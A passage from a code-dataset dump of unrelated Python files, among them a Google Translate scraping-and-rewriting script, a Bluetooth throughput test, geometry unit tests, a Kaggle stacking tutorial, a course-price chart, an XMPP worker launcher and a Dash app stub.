dl_words=300):\n self.spilt = re.compile(r'|\\n', re.I | re.S)\n self.sent_end = re.compile(r'([。.??!!;;])', re.I)\n self.word_limit = word_limit\n self.dl_words = dl_words\n\n self.lan_dict = {\n '中文': 'zh-CN',\n '英文': 'en',\n '俄文': 'ru',\n '法文': 'fr',\n '日文': 'ja',\n '韩文': 'ko'\n }\n\n self.headers={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'}\n self.url = 'http://translate.google.cn/translate_a/single'\n self.session = requests.Session()\n self.session.keep_alive = False\n\n def getTk(self, text):\n return self.get_ctx().call(\"TL\", text)\n\n def get_ctx(self):\n ctx = execjs.compile(\"\"\" \n function TL(a) { \n var k = \"\"; \n var b = 406644; \n var b1 = 3293161072; \n var jd = \".\"; \n var $b = \"+-a^+6\"; \n var Zb = \"+-3^+b+-f\"; \n for (var e = [], f = 0, g = 0; g < a.length; g++) { \n var m = a.charCodeAt(g); \n 128 > m ? e[f++] = m : (2048 > m ? e[f++] = m >> 6 | 192 : (55296 == (m & 64512) && g + 1 < a.length && 56320 == (a.charCodeAt(g + 1) & 64512) ? (m = 65536 + ((m & 1023) << 10) + (a.charCodeAt(++g) & 1023), \n e[f++] = m >> 18 | 240, \n e[f++] = m >> 12 & 63 | 128) : e[f++] = m >> 12 | 224, \n e[f++] = m >> 6 & 63 | 128), \n e[f++] = m & 63 | 128) \n } \n a = b; \n for (f = 0; f < e.length; f++) a += e[f], \n a = RL(a, $b); \n a = RL(a, Zb); \n a ^= b1 || 0; \n 0 > a && (a = (a & 2147483647) + 2147483648); \n a %= 1E6; \n return a.toString() + jd + (a ^ b) \n }; \n function RL(a, b) { \n var t = \"a\"; \n var Yb = \"+\"; \n for (var c = 0; c < b.length - 2; c += 3) { \n var d = b.charAt(c + 2), \n d = d >= t ? d.charCodeAt(0) - 87 : Number(d), \n d = b.charAt(c + 1) == Yb ? a >>> d: a << d; \n a = b.charAt(c) == Yb ? a + d & 4294967295 : a ^ d \n } \n return a \n } \n \"\"\")\n return ctx\n\n def buildUrl(self,text ,tk, sl,tl):\n baseUrl = 'http://translate.google.cn/translate_a/single'\n baseUrl += '?client=webapp&' #这里client改成webapp后翻译的效果好一些 t翻译的比较差 ..\n baseUrl += 'sl=auto&'\n baseUrl += 'tl=' + str(tl) + '&'\n baseUrl += 'hl=zh-CN&'\n baseUrl += 'dt=at&'\n baseUrl += 'dt=bd&'\n baseUrl += 'dt=ex&'\n baseUrl += 'dt=ld&'\n baseUrl += 'dt=md&'\n baseUrl += 'dt=qca&'\n baseUrl += 'dt=rw&'\n baseUrl += 'dt=rm&'\n baseUrl += 'dt=ss&'\n baseUrl += 'dt=t&'\n baseUrl += 'ie=UTF-8&'\n baseUrl += 'oe=UTF-8&'\n baseUrl += 'clearbtn=1&'\n baseUrl += 'otf=1&'\n baseUrl += 'pc=1&'\n baseUrl += 'srcrom=0&'\n baseUrl += 'ssel=0&'\n baseUrl += 'tsel=0&'\n baseUrl += 'kc=2&'\n baseUrl += 'tk=' + str(tk) + '&'\n content=urllib.parse.quote(text)\n baseUrl += 'q=' + content\n return baseUrl\n\n def getHtml(self, session, url, headers):\n try:\n html = session.get(url, headers=headers)\n return html.json()\n except Exception as e:\n return None\n\n def translate(self, from_lan, to_lan, text):\n tk = self.getTk(text)\n url = self.buildUrl(text, tk, from_lan, to_lan)\n result = self.getHtml(self.session, url, self.headers)\n if result != None:\n ans = \"\"\n s=''\n try:\n for i in result[0]:\n if i[0] != None:\n s += i[0]\n for i in s.split('\\n'):\n ans += i\n except TypeError as err:\n pass\n return ans\n else:\n try:\n self.logger.info('谷歌翻译失败 ')\n except AttributeError as err:\n pass\n return None\n\n def split_article(self,article):\n sentences = self.spilt.split(article)\n text = \"\"\n ai_text = \"\"\n while sentences:\n text_len = len(text)\n if text_len < self.word_limit:\n t = sentences.pop(0)\n text += t.strip()\n if text_len >= self.word_limit or not sentences:\n ai_text += self.ai_article(text)\n text = \"\"\n return self.make_dl(ai_text)\n\n def ai_article(self, text):\n if not isinstance(text, str):\n return\n zh_en = self.translate('zh-CN', 'en', text)\n if not zh_en:\n return text\n en_zh = youdao(zh_en)\n # en_zh = self.translate(zh_en, \"en\", \"zh-CN\")\n return en_zh if en_zh else text\n\n def make_dl(self, text):\n new_text = self.sent_end.sub('\\g<1>\\n', text)\n sentences = re.split(r'\\n', new_text)\n new_article = \"\"\n p_text = \"\"\n for t in sentences:\n if len(p_text) > self.dl_words:\n new_article += f'

{p_text}

'\n p_text = \"\"\n continue\n p_text += t\n else:\n new_article += f'

{p_text}

'\n return new_article\n\ndef google(text):\n '''\n 谷歌翻译\n :param text:\n :return:\n '''\n g = translate_google()\n res = g.split_article(text)\n return res\n\nif __name__ == '__main__':\n text = \"\"\n with open('dome.txt', 'r', encoding='utf-8') as f:\n text = f.read()\n # print(text)\n res = google(text)\n print('结果:{}'.format(res))","sub_path":"wp_spider/translate/google.py","file_name":"google.py","file_ext":"py","file_size_in_byte":5986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"454232092","text":"\n\nfrom xai.brain.wordbase.nouns._convulsion import _CONVULSION\n\n#calss header\nclass _CONVULSIONS(_CONVULSION, ):\n\tdef __init__(self,): \n\t\t_CONVULSION.__init__(self)\n\t\tself.name = \"CONVULSIONS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"convulsion\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_convulsions.py","file_name":"_convulsions.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"337372750","text":"# Lint as: python3\n\"\"\"Tests for blueberry.tests.bluetooth.bluetooth_throughput.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport logging\nimport math\n\nfrom mobly import asserts\nfrom mobly import test_runner\nfrom mobly.controllers.android_device_lib.jsonrpc_client_base import ApiError\nfrom mobly.signals import TestAbortClass\n# Internal import\nfrom blueberry.utils import blueberry_base_test\nfrom blueberry.utils import metrics_utils\n# Internal import\n\n\nclass BluetoothThroughputTest(blueberry_base_test.BlueberryBaseTest):\n\n @retry.logged_retry_on_exception(\n retry_intervals=retry.FuzzedExponentialIntervals(\n initial_delay_sec=2, factor=5, num_retries=5, max_delay_sec=300))\n def _measure_throughput(self, num_of_buffers, buffer_size):\n \"\"\"Measures the throughput of a data transfer.\n\n Sends data from the client device that is read by the server device.\n Calculates the throughput for the transfer.\n\n Args:\n num_of_buffers: An integer value designating the number of buffers\n to be sent.\n buffer_size: An integer value designating the size of each buffer,\n in bytes.\n\n Returns:\n The throughput of the transfer in bytes per second.\n \"\"\"\n\n # TODO(user): Need to fix throughput send/receive methods\n (self.phone.sl4a\n .bluetoothConnectionThroughputSend(num_of_buffers, buffer_size))\n\n throughput = (self.derived_bt_device.sl4a\n .bluetoothConnectionThroughputRead(num_of_buffers,\n buffer_size))\n return throughput\n\n def _throughput_test(self, buffer_size, test_name):\n logging.info('throughput test with buffer_size: %d and testname: %s',\n buffer_size, test_name)\n metrics = {}\n throughput_list = []\n num_of_buffers = 1\n for _ in range(self.iterations):\n throughput = self._measure_throughput(num_of_buffers, buffer_size)\n logging.info('Throughput: %d bytes-per-sec', throughput)\n throughput_list.append(throughput)\n\n metrics['data_transfer_protocol'] = self.data_transfer_type\n metrics['data_packet_size'] = buffer_size\n metrics['data_throughput_min_bytes_per_second'] = int(\n min(throughput_list))\n metrics['data_throughput_max_bytes_per_second'] = int(\n max(throughput_list))\n metrics['data_throughput_avg_bytes_per_second'] = int(\n math.fsum(throughput_list) / float(len(throughput_list)))\n\n logging.info('Throughput at large buffer: %s', metrics)\n\n asserts.assert_true(metrics['data_throughput_min_bytes_per_second'] > 0,\n 'Minimum throughput must be greater than 0!')\n\n self.metrics.add_test_metrics(metrics)\n for metric in metrics:\n self.record_data({\n 'Test Name': test_name,\n 'sponge_properties': {\n metric: metrics[metric],\n }\n })\n self.record_data({\n 'Test Name': test_name,\n 'sponge_properties': {\n 'proto_ascii':\n self.metrics.proto_message_to_ascii(),\n 'primary_device_build':\n self.phone.get_device_info()['android_release_id']\n }\n })\n\n def setup_class(self):\n \"\"\"Standard Mobly setup class.\"\"\"\n super(BluetoothThroughputTest, self).setup_class()\n if len(self.android_devices) < 2:\n raise TestAbortClass(\n 'Not enough android phones detected (need at least two)')\n self.phone = self.android_devices[0]\n\n # We treat the secondary phone as a derived_bt_device in order for the\n # generic script to work with this android phone properly. Data will be sent\n # from first phone to the second phone.\n self.derived_bt_device = self.android_devices[1]\n self.phone.init_setup()\n self.derived_bt_device.init_setup()\n self.phone.sl4a_setup()\n self.derived_bt_device.sl4a_setup()\n self.set_btsnooplogmode_full(self.phone)\n self.set_btsnooplogmode_full(self.derived_bt_device)\n\n self.metrics = (\n metrics_utils.BluetoothMetricLogger(\n metrics_pb2.BluetoothDataTestResult()))\n self.metrics.add_primary_device_metrics(self.phone)\n self.metrics.add_connected_device_metrics(self.derived_bt_device)\n\n self.data_transfer_type = metrics_pb2.BluetoothDataTestResult.RFCOMM\n self.iterations = int(self.user_params.get('iterations', 300))\n logging.info('Running Bluetooth throughput test %s times.', self.iterations)\n logging.info('Successfully found required devices.')\n\n def setup_test(self):\n \"\"\"Setup for bluetooth latency test.\"\"\"\n logging.info('Setup Test for test_bluetooth_throughput')\n super(BluetoothThroughputTest, self).setup_test()\n asserts.assert_true(self.phone.connect_with_rfcomm(self.derived_bt_device),\n 'Failed to establish RFCOMM connection')\n\n def test_bluetooth_throughput_large_buffer(self):\n \"\"\"Tests the throughput with large buffer size.\n\n Tests the throughput over a series of data transfers with large buffer size.\n \"\"\"\n large_buffer_size = 300\n test_name = 'test_bluetooth_throughput_large_buffer'\n self._throughput_test(large_buffer_size, test_name)\n\n def test_bluetooth_throughput_medium_buffer(self):\n \"\"\"Tests the throughput with medium buffer size.\n\n Tests the throughput over a series of data transfers with medium buffer\n size.\n \"\"\"\n medium_buffer_size = 100\n test_name = 'test_bluetooth_throughput_medium_buffer'\n self._throughput_test(medium_buffer_size, test_name)\n\n def test_bluetooth_throughput_small_buffer(self):\n \"\"\"Tests the throughput with small buffer size.\n\n Tests the throughput over a series of data transfers with small buffer size.\n \"\"\"\n small_buffer_size = 10\n test_name = 'test_bluetooth_throughput_small_buffer'\n self._throughput_test(small_buffer_size, test_name)\n\n def test_maximum_buffer_size(self):\n \"\"\"Calculates the maximum allowed buffer size for one packet.\"\"\"\n current_buffer_size = 300\n throughput = -1\n num_of_buffers = 1\n while True:\n logging.info('Trying buffer size %d', current_buffer_size)\n try:\n throughput = self._measure_throughput(\n num_of_buffers, current_buffer_size)\n logging.info('The throughput is %d at buffer size of %d', throughput,\n current_buffer_size)\n except ApiError:\n maximum_buffer_size = current_buffer_size - 1\n logging.info('Max buffer size: %d bytes', maximum_buffer_size)\n logging.info('Max throughput: %d bytes-per-second', throughput)\n self.record_data({\n 'Test Name': 'test_maximum_buffer_size',\n 'sponge_properties': {\n 'maximum_buffer_size': maximum_buffer_size\n }\n })\n return True\n current_buffer_size += 1\n\n def teardown_test(self):\n self.phone.sl4a.bluetoothSocketConnStop()\n self.derived_bt_device.sl4a.bluetoothSocketConnStop()\n\n def teardown_class(self):\n self.phone.factory_reset_bluetooth()\n self.derived_bt_device.factory_reset_bluetooth()\n logging.info('Factory resetting Bluetooth on devices.')\n super(BluetoothThroughputTest, self).teardown_class()\n\n\nif __name__ == '__main__':\n test_runner.main()\n","sub_path":"blueberry/tests/connectivity/bluetooth_throughput_test.py","file_name":"bluetooth_throughput_test.py","file_ext":"py","file_size_in_byte":7285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"440674103","text":"import torch\nfrom data import data_utils\nfrom data import bounding_volume\n\n\ndef test_ray_sphere_intersect():\n ray_origin = torch.tensor([[0.0,0.0,4.0],[0.0,0.0,-4.0],[0.0449, 1.0126, -0.4274]])\n ray_dir = torch.tensor([[0.0, 0.0, -1.0],[0.0, 0.0, -1.0],[0.2853, -0.6552, 0.6995]])\n sphere_center = torch.tensor([0.0,0.0,0.0])\n sphere_radius = 1.0\n # intersection points should be [3, 5] and [inf, inf]\n t = bounding_volume.ray_sphere_intersect(ray_origin, ray_dir, sphere_center, sphere_radius)\n print(t)\n\n\ndef test_ray_cube_intersect():\n ray_origin = torch.tensor([[0.0,0.0,4.0],[0.0,0.0,-4.0]])\n ray_dir = torch.tensor([[0.0, 0.0, -1.0],[0.0, 0.0, -1.0]])\n min_bound = torch.Tensor([-0.5, -0.5, -0.5])\n max_bound = torch.Tensor([0.5, 0.5, 0.5])\n # intersection points should be [3.5, 4.5] and [inf, inf]\n t = bounding_volume.ray_cube_intersect(ray_origin, ray_dir, min_bound, max_bound)\n print(t)\n\n\ndef check_coord_conv():\n origins = torch.tensor([[0.0,0.0,0.0],[0.0,0.0,0.0]])\n points = torch.tensor([[1.0,1.0,1.0],[0.0,0.0,-4.0]])\n rays = points - origins\n rays = rays / torch.norm(rays, dim=1)[:,None]\n angles = data_utils.cartesian_to_spherical(rays)\n print(angles)","sub_path":"src/unit_test/test_cases.py","file_name":"test_cases.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"223954253","text":"\n# coding: utf-8\n\n# In[17]:\n\n\ntrain\n\n\n# In[3]:\n\n\ndef feature_exploration_engineering_cleaning():\n import pandas as pd\n import numpy as np\n ID = 'id'\n TARGET = 'loss'\n NROWS = None\n DATA_DIR = \"../input\"\n\n TRAIN_FILE = \"{0}/train.csv\".format(DATA_DIR)\n TEST_FILE = \"{0}/test.csv\".format(DATA_DIR)\n\n train = pd.read_csv(TRAIN_FILE, nrows=NROWS) # id\tcat1\tcat2\tcat3\tcat4\tcat5\tcat6\tcat7\tcat8\tcat9\t...\tcont6\tcont7\tcont8\tcont9\tcont10\tcont11\tcont12\tcont13\tcont14\tloss\n test = pd.read_csv(TEST_FILE, nrows=NROWS) # same without loss (cat1-14 = A or B, contN = from 0.1 to 0.9, loss = from 1000 to 10000)\n\n y_train = train[TARGET].ravel() # convert Series->numpy.ndarray \n train.drop([ID, TARGET], axis=1, inplace=True) # delete 2 cols: 'id' and 'loss'\n test.drop([ID], axis=1, inplace=True)\n\n # print(\"{},{}\".format(train.shape, test.shape)) #(9, 130),(9, 130) * 9_rows 130_cols in each set\n\n ntrain = train.shape[0] # save 9 - rows count\n ntest = test.shape[0] # save 9 - rows count\n train_test = pd.concat((train, test)).reset_index(drop=True) # one big set 18 rows × 130 columns\n features = train.columns # get col names: Index(['cat1', 'cat2',..., 'cont14'], dtype='object', length=130)\n cats = [feat for feat in features if 'cat' in feat] # get col names starting from cat: ['cat1', 'cat2', ..., 'cat116']\n\n for feat in cats:\n train_test[feat] = pd.factorize(train_test[feat], sort=True)[0] # convert A/B -> 1/0 in all cols starting from 'cat'\n\n # print(train_test.head())\n x_train = np.array(train_test.iloc[:ntrain,:]) # select rows from 0 to 9, all cols, and convert to array\n x_test = np.array(train_test.iloc[ntrain:,:]) # select rows from 9 to end, all cols, and convert to array\n #x_train # ndarray of 9 elements-rows (each el - ndarray of 130 elements-cols)\n #x_test # same size\n #y_train # ndarray of 9 elements-float\n\n return x_train, y_train, x_test, ntrain, ntest\n\nx_train, y_train, x_test, ntrain, ntest = feature_exploration_engineering_cleaning()\n\nimport pandas as pd\nimport numpy as np\nimport xgboost as xgb\nfrom sklearn.model_selection import KFold \n# from sklearn.cross_validation import KFold # deprecated: \nfrom sklearn.ensemble import ExtraTreesRegressor\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.metrics import mean_absolute_error\nNFOLDS = 4\nSEED = 0\nDATA_DIR = \"../input\"\nSUBMISSION_FILE = \"{0}/sample_submission.csv\".format(DATA_DIR)\net_params = {'n_jobs': -1, 'n_estimators': 100, 'max_features': 0.5, 'max_depth': 12, 'min_samples_leaf': 2,}\nrf_params = {'n_jobs': -1, 'n_estimators': 100, 'max_features': 0.2, 'max_depth': 8, 'min_samples_leaf': 2,}\nxgb_params = {'seed': 0, 'colsample_bytree': 0.7, 'silent': 1, 'subsample': 0.7, 'learning_rate': 0.075, 'objective': 'reg:linear', 'max_depth': 7, 'num_parallel_tree': 1, 'min_child_weight': 1, 'eval_metric': 'mae', 'nrounds': 350}\n\n\nclass SklearnWrapper(object):\n def __init__(self, clf, seed=0, params=None): # input -> NN + params, output -> NN + 2 functions\n params['random_state'] = seed\n self.clf = clf(**params)\n\n def train(self, x_train, y_train):\n self.clf.fit(x_train, np.log(y_train))\n\n def predict(self, x):\n return np.exp(self.clf.predict(x))\n\n\nclass XgbWrapper(object): # input -> params, output -> xgb + 2 functions\n def __init__(self, seed=0, params=None):\n self.param = params\n self.param['seed'] = seed\n self.nrounds = params.pop('nrounds', 250) # like pull, removes element with key 'nrounds' from dictionary. 250 - any number, doesn`t matter. Pop returns value of removed element\n\n def train(self, x_train, y_train):\n dtrain = xgb.DMatrix(x_train, label=np.log(y_train))\n self.gbdt = xgb.train(self.param, dtrain, self.nrounds)\n\n def predict(self, x):\n return np.exp(self.gbdt.predict(xgb.DMatrix(x)))\n\n\ndef get_oof(clf): # out-of-fold predictions, output-> 2 cols (each has 9 elements) with predictions: 1-oof_train (mean of all kfolds predictions for X_test), 2-oof_test common prediction of X_test (without splitting)\n\n # 3 empty results:\n oof_train = np.zeros((ntrain,)) # [ 0. 0. 0. 0. 0. 0. 0. 0. 0.]\n oof_test = np.zeros((ntest,)) # [ 0. 0. 0. 0. 0. 0. 0. 0. 0.]\n oof_test_skf = np.empty((NFOLDS, ntest)) # np.empty((4, 9)) - random matrix 4rows x 9cols, each row = each loop of kfold\n\n kf = KFold(n_splits=NFOLDS, shuffle=True, random_state=SEED) # NFOLDS = 4 # kf = KFold(ntrain, n_folds=NFOLDS, shuffle=True, random_state=SEED) #old code depricated\n i = 0\n for train_index, test_index in kf.split(x_train,y_train): # creates 4 arrays of 9 indexes (each array divided into 2 parts randomly) len(x_train) = len(y_train) = 9 #for i, (train_index, test_index) in enumerate(kf): # depricated\n #print('train_index=',train_index,'test_index=',test_index) # 4 loops: train_index= [0 3 4 5 6 8] test_index= [1 2 7]\n x_tr = x_train[train_index] #len=6 short versin of x_train (6 instead 9)\n y_tr = y_train[train_index] #len=6 short versin of y_train (6 instead 9) \n x_te = x_train[test_index] #len=3 very short versin of x_train (without y_test?!?)\n\n clf.train(x_tr, y_tr) # train clf - 1 of 3 models: 1)xgb 2)ExtraTreesRegressor 3) RandomForestRegressor\n\n oof_train[test_index] = clf.predict(x_te) # ndarray, like y_test: 9 predicted values[0. 1703.43164062 2394.62524414 0. 0. 0. 0. 2668.16015625 0.]\n # x_te len = 3 [1 2 7], => oof_train has nulls in places [0 3 4 5 6]\n oof_test_skf[i, :] = clf.predict(x_test) # 4 (one for each kfold) elements -> each el = array 4lines x 9cols\n # if i==0: print(clf.predict(x_test)) #[ 1948 3779 1864 2086 1137 2864 1072 1452 3244]\n # print(len(x_test[0])) # 9 els, each has 130 els\n # Summary: we do 4 loops, each loop: input -> 9x130, output -> 4x9, cause this is empty matrix size limit\n i+=1\n # we have 2 results of loop -> oof_train (array[9], overwritten each kfold), oof_test_skf (like 4 oof_train)\n \n #print(oof_train) #[ 1845.48217773 1703.43164062 2394.62524414 2312.72216797 2512.66723633 2064.69555664 2777.49853516 2668.16015625 3149.6484375 ]\n #print(oof_test_skf) # like 4 oof_train\n oof_test[:] = oof_test_skf.mean(axis=0) # convert 4 rows -> 1 row, value = mean in col, cols coutn not changed\n #print(oof_test) # array[9]\n #print(oof_train.reshape(-1, 1)) # converts row -> col, result - col of 9 elements\n #print(oof_test.reshape(-1, 1)) # converts row -> col, result - col of 9 elements\n return oof_train.reshape(-1, 1), oof_test.reshape(-1, 1)\n\n# create 3 objects-models: 1)xgb 2)ExtraTreesRegressor 3) RandomForestRegressor\nxg = XgbWrapper(seed=SEED, params=xgb_params) # model 1 \"xgb\" (create simple object, but when we call train/predict it uses NN \"xgb\")\n # xg.nrounds # 350\n # xg.param # {'colsample_bytree': 0.7, 'eval_metric': 'mae', 'learning_rate': 0.075, 'max_depth': 7, 'min_child_weight': 1, 'num_parallel_tree': 1, 'objective': 'reg:linear', 'seed': 0, 'silent': 1, 'subsample': 0.7}\net = SklearnWrapper(clf=ExtraTreesRegressor, seed=SEED, params=et_params) #et.clf # ExtraTreesRegressor(bootstrap=False, criterion='mse', max_depth=12, ... warm_start=False)\nrf = SklearnWrapper(clf=RandomForestRegressor, seed=SEED, params=rf_params) #rf.clf # RandomForestRegressor(bootstrap=True, criterion='mse', max_depth=8, ... oob_score=False, random_state=0, verbose=0, warm_start=False)\n\nxg_oof_train, xg_oof_test = get_oof(xg)\n #xg_oof_train # array([[ 1845.48217773],[ 1703.43164062],[ 2394.62524414],[ 2312.72216797],[ 2512.66723633], ... [ 3149.6484375 ]])\n #xg_oof_test # array([[ 1884.30587769],[ 2589.99508667],[ 2078.14190674],[ 2734.7199707 ],[ 1669.76080322], ... [ 2155.86022949]])\net_oof_train, et_oof_test = get_oof(et)\nrf_oof_train, rf_oof_test = get_oof(rf)\n\nprint(\"XG-CV: {}\".format(mean_absolute_error(y_train, xg_oof_train)))\nprint(\"ET-CV: {}\".format(mean_absolute_error(y_train, et_oof_train)))\nprint(\"RF-CV: {}\".format(mean_absolute_error(y_train, rf_oof_train)))\n\n# combine all predictions - for all 3 models: from kfold and out of kfold\n# all train - from kfold, all test - without\nx_train = np.concatenate((xg_oof_train, et_oof_train, rf_oof_train), axis=1) # all trains: 3 cols, 9 rows\nx_test = np.concatenate((xg_oof_test, et_oof_test, rf_oof_test), axis=1) # all tests: 3 cols, 9 rows\nprint(\"{},{}\".format(x_train.shape, x_test.shape)) #(9, 3),(9, 3)\n\ndtrain = xgb.DMatrix(x_train, label=np.log(y_train))\ndtest = xgb.DMatrix(x_test)\n\ndef xg_eval_mae(yhat, dtrain):\n y = dtrain.get_label()\n return 'mae', mean_absolute_error(np.exp(y), np.exp(yhat))\n\nxgb_params = {'seed': 0, 'colsample_bytree': 0.8, 'silent': 1, 'subsample': 0.6, 'learning_rate': 0.01, 'objective': 'reg:linear', 'max_depth': 4, 'num_parallel_tree': 1, 'min_child_weight': 1, 'eval_metric': 'mae',}\n# These lines are assigning the value of best iteration from cv run (by early stopping 25 rounds) to be the number of iterations for actual training\nres = xgb.cv(xgb_params, dtrain, num_boost_round=500, nfold=4, seed=SEED, stratified=False,\n early_stopping_rounds=25, verbose_eval=10, show_stdv=True, feval=xg_eval_mae, maximize=False) #The first line does 4-fold cross-validation, outputs on each 10th iteration, and stops the training when the validation score does not improve for 25 iterations. \"res\" variable stores the record of this training.\n \nbest_nrounds = res.shape[0] - 1 # The second line reads the length of \"res\" array (which is equal to the number of training iterations after early stopping) and assigns it to \"best_nrounds\" to be used for training afterwards. Not sure that there should be \" - 1\" in line two because to the best of my knowledge the length of \"res\" variable is actually equal to the number of iterations where the validation score was the best. However, that \"-1\" should not change much in the final outcome.\ncv_mean = res.iloc[-1, 0]\ncv_std = res.iloc[-1, 1]\n\nprint('Ensemble-CV: {0}+{1}'.format(cv_mean, cv_std))\n\ngbdt = xgb.train(xgb_params, dtrain, best_nrounds)\n\nsubmission = pd.read_csv(SUBMISSION_FILE)\nsubmission.iloc[:, 1] = np.exp(gbdt.predict(dtest))\nsubmission.to_csv('result.sub.csv', index=None)\n\n\n# # EXAMPLES\n\n# ### 1) kfold\n\n# In[74]:\n\n\n# old KFOLD has additional parameter - n (we set length of indexes array manually)\n# this KFOLD gets length from X and y\n# GREAT MINUS - percent of train test - random !!!!\n\nfrom sklearn.model_selection import KFold\nX = np.array([[1, 2], [3, 4], [1, 2], [3, 4]])\ny = np.array([1, 2, 3, 4])\nkf = KFold(n_splits=3, shuffle=True, random_state=1)\n#kf.get_n_splits(X)\ni = 0\nfor train_index, test_index in kf.split(X,y):\n print(\"TRAIN:\", train_index, \"TEST:\", test_index, \"i:\", i)\n X_train, X_test = X[train_index], X[test_index]\n y_train, y_test = y[train_index], y[test_index]\n i+=1\n\n# TRAIN: [0 1] TEST: [2 3] i: 0\n# TRAIN: [1 2 3] TEST: [0] i: 1\n# TRAIN: [0 2 3] TEST: [1] i: 2\n\n\n\n# ### 2) class\n\n# In[75]:\n\n\ntw_params = {\n 'xxx': 0,\n 'yyy': 'my_igrik',\n}\n\nclass TestWrapper(object):\n def __init__(self, seed=0, params=None):\n self.param = params\n self.test = seed\n def train(self, x_train, y_train):\n self.my_model = x_train + y_train\n def predict(self, x):\n return x*x\n \ntw = TestWrapper(seed=25, params=tw_params)\ntw.test # 25\ntw.param # {'xxx': 0, 'yyy': 'my_igrik'}\ntw.train(4,2)\ntw.my_model # 6\ntw.predict(3) # 9\n\n\n# ### 3) pop\n\n# In[99]:\n\n\n#remove element with key 'nrounds' from dictionary. 250 - any number, doesn`t matter. Pop returns value of removed element\nxgb_params2 = {\n 'min_child_weight': 1,\n 'eval_metric': 'mae',\n 'nrounds': 350\n}\nprint(len(xgb_params2)) # 3\nxgb_params2.pop('nrounds', 250) # 350 \nprint(len(xgb_params2)) # 2\n\n\n# In[14]:\n\n\nnp.empty((4, 9))\n\n","sub_path":"data_science/7_kaggle/cookbook/3_stacking/code/1_stacking_complex_example.py","file_name":"1_stacking_complex_example.py","file_ext":"py","file_size_in_byte":12410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"125736662","text":"import pandas as pd\nfrom matplotlib import pyplot as plt\n\n# Author : JadeX\n# Time : 2020/1/21 21:33\n\nplt.rcParams['font.sans-serif'] = ['SimHei']\ndata = pd.read_csv('tctest_02.csv')\n\nprice_free = 0\nprice_onedigit = 0\nprice_doubledigit = 0\nprice_threedigit = 0\nprice_fourdigit = 0\nprice_fivedigit = 0\n\nfor prices in data['price']:\n if prices == '免费' or '':\n price_free += 1\n else:\n if type(prices) == str:\n price_num = float(prices[1:])\n else:\n price_num = prices\n # 这里报错了很多次……因为提取到的价格的数值类型有str和float两种 所以处理方式也不一样\n\n if 0 < price_num < 10:\n price_onedigit += 1\n elif 10 <= price_num < 100:\n price_doubledigit += 1\n elif 100 <= price_num < 1000:\n price_threedigit += 1\n elif 1000 <= price_num < 10000:\n price_fourdigit += 1\n elif 10000 <= price_num:\n price_fivedigit += 1\n\nprint(price_free, price_onedigit, price_doubledigit, price_threedigit, price_fourdigit, price_fivedigit)\n\ncourse_price = ['免费', '一位数', '二位数', '三位数', '四位数', '五位数']\ncourse_counts = [price_free, price_onedigit, price_doubledigit, price_threedigit, price_fourdigit, price_fivedigit]\n\nplt.pie(course_counts,\n labels=course_price,\n startangle=0,\n explode=(0.1, 0, 0, 0, 0, 0.2)\n # , autopct='%1.0f%%'\n )\nplt.title('腾讯课堂课程价格分布饼图')\nplt.show()\n\n\n\n\n\n\n\n","sub_path":"徐玥/徐玥_作业1/scrapytest_02/show.py","file_name":"show.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"15974653","text":"'''\nCreated on Jul 8, 2013\n\n@author: pvicente\n'''\nfrom katoo import conf, KatooApp\nfrom katoo.rqtwisted import worker\nfrom katoo.supervisor import MetricsSupervisor, XMPPKeepAliveSupervisor\nfrom katoo.utils.applog import getLoggerAdapter, getLogger\nfrom katoo.utils.multiprocess import MultiProcess\nfrom katoo.utils.time import sleep\nimport os\n\napplication = KatooApp().app\n\nif conf.ADOPTED_STREAM is None:\n os.environ['ADOPTED_STREAM']='' #Avoid to perform Mutlprocess Service in child processes\n \n if conf.MULTIPROCESS>0:\n m=MultiProcess(__file__, number=conf.MULTIPROCESS)\n m.setServiceParent(application)\n\nmetrics_supervisor = MetricsSupervisor()\nmetrics_supervisor.setServiceParent(application)\n\nxmpp_keepalive_supervisor = XMPPKeepAliveSupervisor()\nxmpp_keepalive_supervisor.setServiceParent(application)\n\nif conf.REDIS_WORKERS > 0:\n worker.LOGGING_OK_JOBS = conf.LOGGING_OK_JOBS\n worker.SLEEP_CALL=sleep\n worker.MAX_RETRIES=conf.BACKEND_MAX_RETRIES\n worker.MAX_DELAY_TIME=conf.BACKEND_MAX_DELAY\n\n w=worker.Worker([conf.MACHINEID, conf.DIST_QUEUE_LOGIN, conf.DIST_QUEUE_RELOGIN], name=conf.MACHINEID,\n loops=conf.REDIS_WORKERS, default_result_ttl=conf.DIST_DEFAULT_TTL, default_warmup=conf.WORKER_WARMUP,\n default_enqueue_failed_jobs=conf.DIST_ENQUEUE_FAILED_JOBS,\n default_perform_job_in_thread=conf.DIST_PERFORM_JOB_IN_THREAD, default_thread_pool_size=conf.DIST_THREAD_POOL)\n\n w.log = getLoggerAdapter(getLogger('WORKER', level='INFO'), id='WORKER')\n w.setServiceParent(application)","sub_path":"runxmpp.py","file_name":"runxmpp.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"116884557","text":"# Imports from 3rd party libraries\nimport dash\nimport dash_bootstrap_components as dbc\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nimport pandas as pd\nimport numpy as np\n\n\n\n\n# Imports from this application\nfrom app import app\n\n\nimport pickle\n\npipeline = pickle.load(open('assets/last_model.sav', 'rb'))\n\n# 2 column layout. 1st column width = 4/12\n# 